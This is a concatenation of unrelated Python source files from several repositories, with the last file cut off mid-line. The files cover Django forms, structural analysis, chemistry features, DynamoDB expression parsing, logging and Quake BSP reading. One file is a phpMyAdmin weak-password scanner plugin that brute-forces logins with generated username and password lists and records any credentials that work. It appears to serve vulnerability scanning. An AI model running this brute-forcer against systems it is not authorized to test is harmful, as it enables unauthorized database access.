YarinBou/SJMaster
1
12766123
from django import forms from jobboard.models import Job class FormControl(forms.ModelForm): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) for form_field in self.visible_fields(): form_field.field.widget.attrs['class'] = 'form-control' class CreateNewJobForm(FormControl): class Meta: model = Job fields = ['title', 'job_type', 'major', 'work_from', 'description', 'city', 'address', 'title_keywords'] widgets = {'description': forms.Textarea(attrs={'rows': '5'}), }
1.445313
1
examples/beam_simple_rhino.py
franaudo/fea
0
12766251
from math import pi from compas_fea.cad import rhino from compas_fea.structure import CircularSection from compas_fea.structure import ElasticIsotropic from compas_fea.structure import ElementProperties as Properties from compas_fea.structure import GeneralDisplacement from compas_fea.structure import GeneralStep from compas_fea.structure import PinnedDisplacement from compas_fea.structure import PointLoad from compas_fea.structure import Structure # Author(s): <NAME> (github.com/andrewliew) # Structure mdl = Structure(name='beam_simple', path='C:/Temp/') # Elements network = rhino.network_from_lines(layer='elset_lines') mdl.add_nodes_elements_from_network(network=network, element_type='BeamElement', elset='elset_lines', axes={'ex': [0, -1, 0]}) # Sets rhino.add_sets_from_layers(mdl, layers=['nset_left', 'nset_right', 'nset_weights']) # Materials mdl.add(ElasticIsotropic(name='mat_elastic', E=20*10**9, v=0.3, p=1500)) # Sections _, ekeys, L, Lt = rhino.ordered_network(mdl, network=network, layer='nset_left') for i, Li in zip(ekeys, L): ri = (1 + Li / Lt) * 0.020 sname = 'sec_{0}'.format(i) mdl.add(CircularSection(name=sname, r=ri)) mdl.add(Properties(name='ep_{0}'.format(i), material='mat_elastic', section=sname, elements=[i])) # Displacements mdl.add([ PinnedDisplacement(name='disp_left', nodes='nset_left'), GeneralDisplacement(name='disp_right', nodes='nset_right', y=0, z=0, xx=0), GeneralDisplacement(name='disp_rotate', nodes='nset_left', yy=30*pi/180), ]) # Loads mdl.add(PointLoad(name='load_weights', nodes='nset_weights', z=-100)) # Steps mdl.add([ GeneralStep(name='step_bc', displacements=['disp_left', 'disp_right']), GeneralStep(name='step_load', loads='load_weights', displacements='disp_rotate'), ]) mdl.steps_order = ['step_bc', 'step_load'] # Summary mdl.summary() # Run mdl.analyse_and_extract(software='opensees', fields=['u', 'ur', 'sf', 'sm']) rhino.plot_data(mdl, step='step_load', field='um', radius=0.01, cbar_size=0.3) rhino.plot_data(mdl, step='step_load', field='sf1', radius=0.01, cbar_size=0.3) rhino.plot_data(mdl, step='step_load', field='sf2', radius=0.01, cbar_size=0.3) rhino.plot_data(mdl, step='step_load', field='sm1', radius=0.01, cbar_size=0.3)
1.640625
2
chemmltoolkit/features/atomFeatures.py
Andy-Wilkinson/ChemMLToolk
1
12766379
<reponame>Andy-Wilkinson/ChemMLToolk from os import path from rdkit.Chem import Mol from chemmltoolkit.features.decorators import tokenizable_feature from rdkit.Chem import Atom from rdkit.Chem import AllChem from rdkit.Chem import ChiralType from rdkit.Chem import HybridizationType from rdkit.Chem import rdCIPLabeler class _ChemicalFeatureGenerator(): _instance = None def __new__(cls): if cls._instance is None: cls._instance = super( _ChemicalFeatureGenerator, cls).__new__(cls) from rdkit import RDConfig from rdkit.Chem import ChemicalFeatures fdef_path = path.join(RDConfig.RDDataDir, 'BaseFeatures.fdef') cls._instance.feature_factory = \ ChemicalFeatures.BuildFeatureFactory(fdef_path) return cls._instance def assign_features(self, mol: Mol): for atom in mol.GetAtoms(): atom.SetProp('_Feature_Acceptor', '0') atom.SetProp('_Feature_Donor', '0') features = self.feature_factory.GetFeaturesForMol(mol) for feature in features: family = feature.GetFamily() for atom_idx in feature.GetAtomIds(): atom = mol.GetAtomWithIdx(atom_idx) if family == 'Acceptor': atom.SetProp('_Feature_Acceptor', '1') elif family == 'Donor': atom.SetProp('_Feature_Donor', '1') def atomic_number(atom: Atom) -> int: """Atomic number (int). """ return atom.GetAtomicNum() def atomic_mass(atom: Atom) -> float: """Atomic mass (float). """ return atom.GetMass() def charge(atom: Atom) -> int: """Formal charge (int). """ return atom.GetFormalCharge() def charge_gasteiger(atom: Atom) -> float: """Gasteiger partial charge (float). """ if not atom.HasProp('_GasteigerCharge'): mol = atom.GetOwningMol() AllChem.ComputeGasteigerCharges(mol) return atom.GetDoubleProp('_GasteigerCharge') def charge_gasteiger_h(atom: Atom) -> float: """Gasteiger partial charge for implicit hydrogens (float). """ if not atom.HasProp('_GasteigerHCharge'): mol = atom.GetOwningMol() AllChem.ComputeGasteigerCharges(mol) return atom.GetDoubleProp('_GasteigerHCharge') @tokenizable_feature([ChiralType.CHI_UNSPECIFIED, ChiralType.CHI_TETRAHEDRAL_CW, ChiralType.CHI_TETRAHEDRAL_CCW, ChiralType.CHI_OTHER]) def chiral_tag(atom: Atom) -> ChiralType: """Chirality of the atom (ChiralType) """ return atom.GetChiralTag() def degree(atom: Atom) -> int: """Number of directly bonded neighbours (int). """ return atom.GetDegree() @tokenizable_feature([HybridizationType.SP, HybridizationType.SP2, HybridizationType.SP3, HybridizationType.SP3D, HybridizationType.SP3D2]) def hybridization(atom: Atom) -> HybridizationType: """Hybridisation (HybridizationType). """ return atom.GetHybridization() def hydrogens(atom: Atom) -> int: """Total number of hydrogen atoms (int). """ return atom.GetTotalNumHs() def index(atom: Atom) -> int: """Index within the parent molecule (int). """ return atom.GetIdx() def is_aromatic(atom: Atom) -> int: """If the atom is aromatic (0 or 1). """ return int(atom.GetIsAromatic()) def is_hbond_acceptor(atom: Atom) -> int: """If the atom is a hydrogen bond acceptor (0 or 1). """ if not atom.HasProp('_Feature_Acceptor'): mol = atom.GetOwningMol() _ChemicalFeatureGenerator().assign_features(mol) return atom.GetIntProp('_Feature_Acceptor') def is_hbond_donor(atom: Atom) -> int: """If the atom is a hydrogen bond donor (0 or 1). """ if not atom.HasProp('_Feature_Donor'): mol = atom.GetOwningMol() _ChemicalFeatureGenerator().assign_features(mol) return atom.GetIntProp('_Feature_Donor') def is_ring(atom: Atom) -> int: """If the atom is is in a ring (0 or 1). """ return int(atom.IsInRing()) def is_ringsize(ringSize: int) -> int: """If the atom is is in a ring of the specified size (0 or 1). Args: ringSize: The size of the ring. """ def _is_ringsize(atom: Atom): return int(atom.IsInRingSize(ringSize)) _is_ringsize.__name__ = f'is_ringsize({ringSize})' return _is_ringsize def isotope(atom: Atom) -> int: """Isotope (int). """ return atom.GetIsotope() def radical(atom: Atom) -> int: """Number of radical electrons (int). """ return atom.GetNumRadicalElectrons() @tokenizable_feature(['', 'R', 'S']) def stereochemistry(atom: Atom) -> str: """CIP sterochemistry label (string). """ mol = atom.GetOwningMol() if not mol.HasProp('_CIPLabelsAssigned'): rdCIPLabeler.AssignCIPLabels(mol) mol.SetProp('_CIPLabelsAssigned', '1') return atom.GetProp('_CIPCode') if atom.HasProp('_CIPCode') else '' def symbol(atom: Atom) -> str: """Atomic symbol (string). """ return atom.GetSymbol()
1.414063
1
celery_app/plugins/pluginnormal/phpmyadmin_weak_password.py
tiaotiaolong/piu
2
12766507
import requests import re from celery_app.utils.utils import insert_vuln_db from celery_app.config.config import web_port_long #通达 OA 系统 SQL 注入漏洞 plugin_id=73 default_port_list=web_port_long def get_token(url): result = re.findall('<input type="hidden" name="token" value="(\w+)" />', requests.get(url, timeout=10).text) if result: return result[0] return False def is_phpmyadmin(url): return 'phpMyAdmin' in requests.get(url, timeout=10).text def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) urls = [target, '{}/phpmyadmin/index.php'.format(target)] try: for url in urls: if not is_phpmyadmin(url): continue simple_passwords = ['', '<PASSWORD>', '<PASSWORD>', '<PASSWORD>', '<PASSWORD>', '!@#', '<PASSWORD>', '111', '666', '1314'] simple_users = ['', 'root', 'test', 'admin', 'server', 'password', 'mysql', 'ceshi', 'mima', host.split('.')[0]] passwords = ['{}{}'.format(user, password) for user in simple_users for password in simple_passwords] for user in ['root', 'test', 'server', 'ceshi']: for pwd in passwords: token = get_token(url) if not token: return False data = { "pma_username": user, "pma_password": <PASSWORD>, "server": 1, "token": token } requests.packages.urllib3.disable_warnings() response = requests.post(url, data, timeout=7, headers={'Cookie': "pma_lang=zh_CN"}) if 'login_form' in response.text: continue elif response.status_code == 200 and 'db_structure.php' in response.text: output = "用户名:{}\t 密码:{}".format(user, pwd) target = url insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except: return False return False
1.492188
1
flask_app.py
molliewhite/mission_to_mars
0
12766635
#Get dependencies from flask import Flask, render_template, redirect import pymongo import mission_to_mars import jinja2 from jinja2 import TemplateNotFound #Create Flask App app = Flask(__name__) #Connect to MongoDB conn = "mongodb://localhost:27017" client = pymongo.MongoClient(conn) db = client.mars_DB @app.route("/") def index(): mars = db.mars_data.find_one() return render_template("index.html", mars=mars) @app.route("/scrape") def scrape(): mars_data = mission_to_mars.scrape() db.mars_data.update( {}, mars_data, upsert=True ) return redirect("http://localhost:5000/", code=302) if __name__ == "__main__": app.run(debug=True)
1.359375
1
rf_command.py
glzjin/eventbridge-client-for-consumer
0
12766763
import serial import struct rf_channel_list = [b"\x01", b"\x02", b"\x03", b"\x04"] def send_rf_command(config_class, channel, is_study = False): ser = serial.Serial( port = config_class.tty, baudrate = 9600, parity = serial.PARITY_NONE, stopbits = serial.STOPBITS_ONE, bytesize = serial.EIGHTBITS ) ser.flushInput() ser.flushOutput() if is_study: data = b"\xAA" else: data = b"\xBB" data += rf_channel_list[channel] data += b"\xFF" ser.write(data) ser.flushInput() ser.flushOutput() ser.close()
1.875
2
decomp.py
MelyPic/labgaif
0
12766891
''' Handle transactional file via github's labgaif/td2dot.py Similar to integration tests inside maindecomposition but trying them "from outside file". Yesterday I got some strange error in the union/find str but I cannot reproduce it anymore :( It read: if x.parent == x: AttributeError: 'str' object has no attribute 'parent' ''' from maindecomposition import decompose, stdGgraph, labGgraph, hack_items_in, hack_graph_in from td2dot import read_graph_in # ~ from td2dot import dump_graph # might become necessary to track read in graph datasetfile = 'titanic_' graph, items = read_graph_in(datasetfile + '.td') # make items available as global variable, necessary for Ely's code to work # there, replace '-' and '=' in names as disallowed by dot # means currently: # TotalAttributesValues = [ item.replace('-', '_').replace('=', '_') for item in items ] hack_items_in(items) # option 1 for original labeled Gaifman graph # ~ my_graph = labGgraph(graph, items) # option 2 for standard Gaifman graph my_graph = stdGgraph(graph, items) # make my_graph available as global variable, necessary for Ely's code to work hack_graph_in(my_graph) #decompose it decompose(my_graph, '2', datasetfile + '_std_decomp')
1.0625
1
dynamodb_ce/ceparser.py
QuiNovas/dynamodb-conditional-expressions
0
12767019
__all__ = ["CeParser"] from copy import deepcopy from decimal import Decimal from typing import Callable, Dict, Set, Union import simplejson as json from boto3.dynamodb.types import ( BINARY, BINARY_SET, BOOLEAN, LIST, MAP, NULL, NUMBER, NUMBER_SET, STRING, STRING_SET, Binary, TypeDeserializer, TypeSerializer, ) from sly.yacc import Parser from .celexer import CeLexer class CeTypeDeserializer(TypeDeserializer): def deserialize(self, value): if value and isinstance(value, dict): if list(value)[0] in ( BINARY, BINARY_SET, BOOLEAN, LIST, MAP, NULL, NUMBER, NUMBER_SET, STRING, STRING_SET, ): value = super().deserialize(value) else: value = {k: self.deserialize(v) for k, v in value.items()} return value.value if isinstance(value, Binary) else value _TYPE_DESERIALIZER = CeTypeDeserializer() _TYPE_SERIALIZER = TypeSerializer() Dynamo = Union[ Binary, bool, Decimal, dict, list, None, str, Set[Binary], Set[Decimal], Set[str] ] ExpressionAttributeNames = Dict[str, str] ExpressionAttributeValues = DynamoItem = Dict[str, Union[Dynamo, Dict[str, Dynamo]]] class CeParser(Parser): _expression_cache: Dict[int, Callable[[DynamoItem], bool]] = dict() def __init__( self, *, expression_attribute_names: ExpressionAttributeNames = None, expression_attribute_values: ExpressionAttributeValues = None, ): self._expression_attribute_names: ExpressionAttributeNames = dict() self._expression_attribute_values: ExpressionAttributeValues = dict() self.expression_attribute_names = expression_attribute_names or dict() self.expression_attribute_values = expression_attribute_values or dict() self._set_expression_attribute_json() super().__init__() def _set_expression_attribute_json(self) -> None: self._expression_attribute_json = json.dumps( self._expression_attribute_names, separators=(",", ":"), use_decimal=True ) + json.dumps( self._expression_attribute_values, separators=(",", ":"), use_decimal=True ) @property def expression_attribute_names(self) -> ExpressionAttributeNames: return deepcopy(self._expression_attribute_names) @expression_attribute_names.setter def expression_attribute_names( self, expression_attribute_names: ExpressionAttributeNames ) -> None: self._expression_attribute_names = ( deepcopy(expression_attribute_names) or dict() ) self._set_expression_attribute_json() @expression_attribute_names.deleter def expression_attribute_names(self) -> None: self._expression_attribute_names: ExpressionAttributeNames = dict() self._set_expression_attribute_json() @property def expression_attribute_values(self) -> ExpressionAttributeValues: return deepcopy(self._expression_attribute_values) @expression_attribute_values.setter def expression_attribute_values( self, expression_attribute_values: ExpressionAttributeValues ) -> None: self._expression_attribute_values: ExpressionAttributeValues = ( _TYPE_DESERIALIZER.deserialize(expression_attribute_values) or dict() ) self._set_expression_attribute_json() @expression_attribute_values.deleter def expression_attribute_values(self) -> None: self._expression_attribute_values: ExpressionAttributeValues = dict() self._set_expression_attribute_json() def evaluate(self, /, expression: str, item: DynamoItem) -> bool: return self.parse(expression)(item) @classmethod def flush_cache(cls) -> None: cls._expression_cache: Dict[int, Callable[[DynamoItem], bool]] = dict() def parse(self, expression: str) -> Callable[[DynamoItem], bool]: expression_hash = hash(expression + self._expression_attribute_json) if expression_hash not in self._expression_cache: compiled_expression: Callable[[DynamoItem], bool] = super().parse( CeLexer().tokenize(expression) ) def truthy(item: DynamoItem) -> bool: item = _TYPE_DESERIALIZER.deserialize(item) return compiled_expression(item) self._expression_cache[expression_hash] = lambda m: truthy(m) return self._expression_cache[expression_hash] # Get the token list from the lexer (required) tokens = CeLexer.tokens precedence = ( ("left", OR), ("left", AND), ("right", NOT), ("right", PARENS), ("left", ATTRIBUTE_EXISTS, ATTRIBUTE_NOT_EXISTS, BEGINS_WITH, CONTAINS), ("left", BETWEEN), ("left", IN), ("left", EQ, NE, LT, LTE, GT, GTE), ) # Grammar rules and actions @_("operand EQ operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: operand0(m) == operand1(m) @_("operand NE operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: operand0(m) != operand1(m) @_("operand GT operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: operand0(m) > operand1(m) @_("operand GTE operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: operand0(m) >= operand1(m) @_("operand LT operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: operand0(m) < operand1(m) @_("operand LTE operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: operand0(m) <= operand1(m) @_("operand BETWEEN operand AND operand") def condition(self, p): operand0 = p.operand0 operand1 = p.operand1 operand2 = p.operand2 return lambda m: operand1(m) <= operand0(m) <= operand2(m) @_('operand IN "(" in_list ")"') def condition(self, p): operand = p.operand in_list = p.in_list return lambda m: operand(m) in in_list(m) @_("function") def condition(self, p): function = p.function return lambda m: function(m) @_("condition AND condition") def condition(self, p): condition0 = p.condition0 condition1 = p.condition1 return lambda m: condition0(m) and condition1(m) @_("condition OR condition") def condition(self, p): condition0 = p.condition0 condition1 = p.condition1 return lambda m: condition0(m) or condition1(m) @_("NOT condition") def condition(self, p): condition = p.condition return lambda m: not condition(m) @_('"(" condition ")" %prec PARENS') def condition(self, p): condition = p.condition return lambda m: condition(m) @_('ATTRIBUTE_EXISTS "(" path ")"') def function(self, p): path = p.path return lambda m: path(m) is not None @_('ATTRIBUTE_NOT_EXISTS "(" path ")"') def function(self, p): path = p.path return lambda m: path(m) is None @_('ATTRIBUTE_TYPE "(" path "," operand ")"') def function(self, p): path = p.path operand = p.operand return lambda m: list(_TYPE_SERIALIZER.serialize(path(m)))[0] == operand(m) @_('BEGINS_WITH "(" path "," operand ")"') def function(self, p): path = p.path operand = p.operand return ( lambda m: path(m).startswith(operand(m)) if isinstance(path(m), str) else False ) @_('CONTAINS "(" path "," operand ")"') def function(self, p): path = p.path operand = p.operand return ( lambda m: operand(m) in path(m) if isinstance(path(m), (str, set)) else False ) @_('SIZE "(" path ")"') def operand(self, p): path = p.path return ( lambda m: len(path(m)) if isinstance(path(m), (str, set, dict, bytearray, bytes, list)) else -1 ) @_('in_list "," operand') def in_list(self, p): in_list = p.in_list operand = p.operand return lambda m: [*in_list(m), operand(m)] @_('operand "," operand') def in_list(self, p): operand0 = p.operand0 operand1 = p.operand1 return lambda m: [operand0(m), operand1(m)] @_("path") def operand(self, p): return p.path @_("VALUE") def operand(self, p): VALUE = p.VALUE expression_attribute_values = self._expression_attribute_values return lambda m: expression_attribute_values.get(VALUE) @_('path "." NAME') def path(self, p): path = p.path NAME = p.NAME return lambda m: path(m).get(NAME) if path(m) else None @_('path "." NAME_REF') def path(self, p): path = p.path NAME_REF = p.NAME_REF expression_attribute_names = self._expression_attribute_names return ( lambda m: path(m).get(expression_attribute_names.get(NAME_REF)) if path(m) else None ) @_('path "[" INDEX "]"') def path(self, p): path = p.path INDEX = p.INDEX return ( lambda m: path(m)[INDEX] if isinstance(path(m), list) and len(path(m)) > INDEX else None ) @_("NAME") def path(self, p): NAME = p.NAME return lambda m: m.get(NAME) @_("NAME_REF") def path(self, p): NAME_REF = p.NAME_REF expression_attribute_names = self._expression_attribute_names return lambda m: m.get(expression_attribute_names.get(NAME_REF))
1.210938
1
LittleBigCode/code/ppc.py
ElodieQ/EPIDEMIUM-Season-3
0
12767147
<reponame>ElodieQ/EPIDEMIUM-Season-3 """ Preprocessing related functions """ import os import pandas as pd from PIL import Image from pathlib import Path import datetime import numpy as np import cv2 import matplotlib.pyplot as plt import itertools from sklearn.model_selection import train_test_split from functools import partial import warnings warnings.filterwarnings('ignore') def _as_date(x): """ Helper to cast DataFrame date column """ return datetime.datetime.strptime(x, "%Y-%m-%d") def read_korl_csv(path): """ Read the KORL csv and potentially correct stuff """ df = pd.read_csv(path) df['computed_os'] = df.apply(lambda row: \ (_as_date(row['Date_derniere_nouvelles']) - _as_date(row['Date_biopsie'])).days / 30., axis=1) return df def _get_id(x): """ Get patient ID from image file path """ return str(x).split(os.sep)[-1].split('_')[0] def get_id2f(markers_dpath): """ Find all images' paths for each patient """ id2f = {} for i, dpath in enumerate(markers_dpath): fpaths = list(dpath.iterdir()) for path in fpaths: _id = _get_id(path) if _id in id2f: id2f[_id].append(str(path)) else: id2f[_id] = [str(path)] return id2f def get_all_combinations(fpaths): """ Produce all possible combinations of images for each patient, following the rule of 1 image per marker for each patient. """ subsets = [] for subset in itertools.combinations(fpaths, 6): skip = False markers = set(int(e.split('marker')[1].split(os.sep)[0]) for e in subset) for i in range(1, 7): if i not in markers: skip = True break if skip: continue subsets.append(tuple(sorted(subset))) return set(subsets) def prepare_target(x): """ Encode the OS into 3 categories """ if x <= 24: return 0 elif x <= 72: return 1 else: return 2 def prepare_dataset(db_path, id2f, is_train=True): """ Read KORL csv files and produce the dataset : one sample contains 1 image of each marker for each patient. The dataset contains all combinations for each patient. Parameters -------- db_path: str Path of the 'data/' directory id2f: dict Patient ID to list of images' paths dictionary is_train: bool Whether we expect a target column or not Returns -------- df_full: pandas DataFrame Dataset """ # Read csv df = read_korl_csv(db_path) ids = set(df['Patient_ID'].values.tolist()) if is_train: id2os = {k: v for k, v in df[['Patient_ID', 'OS']].values.tolist()} else: df.iloc[0,0] = "905e61" # Error in data # Get usable dataframe df_full = pd.DataFrame() for patient, fpaths in id2f.items(): if patient not in ids: continue combinations = get_all_combinations(fpaths) cur_df = pd.DataFrame([[patient] + list(tup) for tup in combinations], columns=['patient']+[f'marker{i}' for i in range(1,7)]) df_full = pd.concat([df_full, cur_df], axis=0).reset_index(drop=True) if is_train: df_full['OS'] = df_full['patient'].apply(lambda x: id2os[x]) df_full['target'] = df_full['OS'].apply(prepare_target) return df_full def _split_train_val(df, test_size=.3): """ Split the training dataframe into actual training and validation. Splitting based on patient ID Parameters -------- test_size: float [0., 1.] Part of training patients (not samples !) to use as validation Returns -------- df_train: pandas DataFrame Training data df_val: pandas DataFrame Validation data """ id_train, id_val = train_test_split(df['patient'].unique(), test_size=.3, random_state=42) df_train = df[df['patient'].isin(id_train)].reset_index(drop=True) df_val = df[df['patient'].isin(id_val)].reset_index(drop=True) return df_train, df_val def get_train_val_test_dfs(val_size=.3): """ Gather the training and test data without loading images + create a validation set based on the training data. Parameters -------- val_size: float [0., 1.] Part of training patients (not samples !) to use as validation Returns -------- df_train: pandas DataFrame Training data df_val: pandas DataFrame Validation data df_test: pandas DataFrame Test data """ # Constants data_path = Path('.').resolve().parents[0].joinpath('data') train_db_path = str(data_path.joinpath('KORL_avatar_train.csv')) test_db_path = str(data_path.joinpath('KORL_avatar_test_X.csv')) markers_dpath = [data_path.joinpath(f'marker{i}') for i in range(1, 7)] # id2f = get_id2f(markers_dpath) df_train = prepare_dataset(train_db_path, id2f, is_train=True) df_train, df_val = _split_train_val(df_train, test_size=val_size) df_test = prepare_dataset(test_db_path, id2f, is_train=False) return df_train, df_val, df_test def red_count_preprocess(df, red_thresh=50): """ Produce a dataframe of size N x 6, where N is the number samples and 6 is the 6 different markers. Each value is the percentage of red pixels in each image. Parameters -------- df: pandas DataFrame Dataset with unloaded images, contains the images' paths for each sample red_thresh: int [0,255] Value above which the pixel is considered red Returns -------- df : pandas Dataframe Datframe with 6 columns ( 'marker_1', ..., 'marker_6) """ img2red = {} # Function for each row def _df_to_img(row): img = [] for i in range(1, 7): fpath = row[f"marker{i}"] if fpath in img2red: img.append(img2red[fpath]) else: tmp = cv2.imread(row[f"marker{i}"])[:,:,0] tmp[tmp[:,:]<red_thresh] = 0 tmp[tmp[:,:]>0] = 1 res = np.sum(tmp) / (1404*1872) img.append(res) img2red[fpath] = res return img X = np.array(df.apply(_df_to_img, axis=1).values.tolist()) df = pd.DataFrame( X, columns = ['marker_{}'.format(i) for i in range(1, 7)], index = df['patient']) return df def preprocess_KORL (features, db_path ) : """ Produce a dataframe of size N_patient x features, where N is of patient in the clinical data. image. Parameters -------- features: list List of columns of the clinical data to keep db_path : string Path of the clinical data Returns -------- df : panda dataframe Datframe with len(features) columns """ #Read and preprocess data df = pd.read_csv(db_path) df = df.set_index("Patient_ID") df['N'] = df['N'].replace(to_replace=r'^2[a,b,c]', value='2', regex=True).astype(int) df['Age_diag'] = round(df['Age_diag']/10).astype(int) return df[features] def full_preprocess(features, db_path, df, red_thresh= 50 ) : """ Produce a dataframe of size N x 6 + len(features), where N is the number samples, 6 is the 6 different markers. Each value for the market is the percentage of red and there is also the clinical data. image. Parameters -------- features: list List of columns of the clinical data to keep df_path : string Path of the clinical csv data df: pandas DataFrame Dataset with unloaded images, contains the images' paths for each sample red_thresh: int [0,255] Value above which the pixel is considered red Returns -------- df_final : pandas dataframe Datframe with the 6 columns ( 'marker_1', ..., 'marker_6) and the features columns from the clinical data """ df_images = red_count_preprocess(df, red_thresh) df_clinical = preprocess_KORL(features, db_path) df_final = pd.merge(df_images, df_clinical, left_index= True, right_index= True, how = 'inner') return df_final
2.078125
2
2016_IceCTF/a_strong_feeling_for_bruteforcing.py
kenoph/WriteUps
2
12767275
<gh_stars>1-10 #!/usr/bin/env python3 import subprocess def run(txt): return subprocess.run('./a_strong_feeling', input=txt, stdout=subprocess.PIPE).stdout if __name__ == '__main__': key = b'' for n in range(500): res = dict() for l in range(1, 128): curr = key + bytes([l]) out = run(curr) if out not in res: res[out] = curr else: del res[out] key = list(res.values())[0] if key[-1] == 0x7F: key = key[:-1] break print(key)
1.757813
2
test/functional/test-framework/log/base_log.py
josehu07/open-cas-linux-mf
2
12767403
<gh_stars>1-10 # # Copyright(c) 2019-2020 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause-Clear # from enum import Enum from re import sub class BaseLogResult(Enum): DEBUG = 10 PASSED = 11 WORKAROUND = 12 WARNING = 13 SKIPPED = 14 FAILED = 15 EXCEPTION = 16 BLOCKED = 17 CRITICAL = 18 def escape(msg): return sub(u'[^\u0020-\uD7FF\u0009\u000A\u000D\uE000-\uFFFD\U00010000-\U0010FFFF]+', '', msg) class BaseLog(): def __init__(self, begin_message=None): self.__begin_msg = begin_message self.__result = BaseLogResult.PASSED def __enter__(self): if self.__begin_msg is not None: self.begin(self.__begin_msg) else: self.begin("Start BaseLog ...") def __exit__(self, *args): self.end() def __try_to_set_new_result(self, new_result): if new_result.value > self.__result.value: self.__result = new_result def begin(self, message): pass def debug(self, message): pass def info(self, message): pass def workaround(self, message): self.__try_to_set_new_result(BaseLogResult.WORKAROUND) def warning(self, message): self.__try_to_set_new_result(BaseLogResult.WARNING) def skip(self, message): self.__try_to_set_new_result(BaseLogResult.SKIPPED) def error(self, message): self.__try_to_set_new_result(BaseLogResult.FAILED) def blocked(self, message): self.__try_to_set_new_result(BaseLogResult.BLOCKED) def exception(self, message): self.__try_to_set_new_result(BaseLogResult.EXCEPTION) def critical(self, message): self.__try_to_set_new_result(BaseLogResult.CRITICAL) def end(self): return self.__result def get_result(self): return self.__result
1.984375
2
ingestion/src/metadata/ingestion/models/json_serializable.py
rongfengliang/OpenMetadata
0
12767531
# Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import abc import json NODE_KEY = "KEY" NODE_LABEL = "LABEL" NODE_REQUIRED_HEADERS = {NODE_LABEL, NODE_KEY} class JsonSerializable(object, metaclass=abc.ABCMeta): def __init__(self) -> None: pass @staticmethod def snake_to_camel(s): a = s.split("_") a[0] = a[0].lower() if len(a) > 1: a[1:] = [u.title() for u in a[1:]] return "".join(a) @staticmethod def serialize(obj): return {JsonSerializable.snake_to_camel(k): v for k, v in obj.__dict__.items()} def to_json(self): return json.dumps( JsonSerializable.serialize(self), indent=4, default=JsonSerializable.serialize, )
1.773438
2
inventory/migrations/0002_auto_20200919_1121.py
Kgford/TCLI
0
12767659
<filename>inventory/migrations/0002_auto_20200919_1121.py # Generated by Django 3.0.8 on 2020-09-19 15:21 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('inventory', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='inventory', name='quantity', ), migrations.RemoveField( model_name='inventory', name='recieved_date', ), migrations.RemoveField( model_name='inventory', name='shipped_date', ), migrations.AddField( model_name='events', name='rtv', field=models.CharField(default='N/A', max_length=20, verbose_name='Item Serial number'), ), migrations.AlterField( model_name='inventory', name='category', field=models.CharField(default='N/A', max_length=50, null=True, verbose_name='category'), ), migrations.AlterField( model_name='inventory', name='description', field=models.CharField(default='N/A', max_length=200, null=True, verbose_name='description'), ), migrations.AlterField( model_name='inventory', name='modelname', field=models.CharField(default='N/A', max_length=50, null=True, verbose_name='modelname'), ), migrations.AlterField( model_name='inventory', name='serial_number', field=models.CharField(default='N/A', max_length=50, null=True, verbose_name='serial number'), ), migrations.AlterField( model_name='inventory', name='shelf', field=models.CharField(default='N/A', max_length=10, null=True, verbose_name='shelf'), ), migrations.AlterField( model_name='inventory', name='status', field=models.CharField(default='N/A', max_length=50, null=True, verbose_name='status'), ), ]
0.566406
1
qcli/bsp2svg/api.py
LaudateCorpus1/quake-cli-tools
42
12767787
<filename>qcli/bsp2svg/api.py<gh_stars>10-100 from collections import namedtuple from functools import lru_cache from vgio.quake import bsp def dot(v0, v1): return v0[0] * v1[0] + v0[1] * v1[1] + v0[2] * v1[2] def cross(v0, v1): return v0[1] * v1[2] - v0[2] * v1[1], \ v0[2] * v1[0] - v0[0] * v1[2], \ v0[0] * v1[1] - v0[1] * v1[0] def subtract(v0, v1): return v0[0] - v1[0], v0[1] - v1[1], v0[2] - v1[2] __all__ = ['Bsp'] class Bsp(object): __slots__ = ( 'models' ) def __init__(self, models): self.models = models @staticmethod def open(file): bsp_file = bsp.Bsp.open(file) bsp_file.close() def get_models(): return [process_model(m) for m in bsp_file.models] def process_model(bsp_model): faces = get_faces(bsp_model) return Model(faces) def get_faces(bsp_model): start = bsp_model.first_face stop = start + bsp_model.number_of_faces face_range = range(start, stop) return [process_face(f) for f in face_range] @lru_cache(maxsize=None) def process_face(face_index): edges = get_edges(face_index) vertexes = get_vertexes(face_index) uvs = []#get_uvs(face_index) plane = get_plane(face_index) texture_name = get_texture_name(face_index) return Face(vertexes, edges, uvs, plane, texture_name) @lru_cache(maxsize=None) def get_edges(face_index): bsp_face = bsp_file.faces[face_index] start = bsp_face.first_edge stop = start + bsp_face.number_of_edges es = bsp_file.surf_edges[start:stop] result = [] for e in es: v = bsp_file.edges[abs(e)].vertexes if e < 0: v = list(reversed(v)) v0 = process_vertex(v[0]) v1 = process_vertex(v[1]) result.append(Edge(v0, v1)) return result @lru_cache(maxsize=None) def get_vertexes(face_index): edges = get_edges(face_index) return [e.vertex_0 for e in edges] @lru_cache(maxsize=None) def process_vertex(index): bsp_vertex = bsp_file.vertexes[index] return Vertex(*bsp_vertex[:]) @lru_cache(maxsize=None) def get_texture_name(face_index): if face_index == -1: return '' bsp_face = bsp_file.faces[face_index] if bsp_face.texture_info == -1: return '' tex_info = bsp_file.texture_infos[bsp_face.texture_info] miptex = bsp_file.miptextures[tex_info.miptexture_number] if not miptex: return '' return miptex.name @lru_cache(maxsize=None) def get_uvs(face_index): bsp_face = bsp_file.faces[face_index] vertexes = get_vertexes(face_index) texture_info = 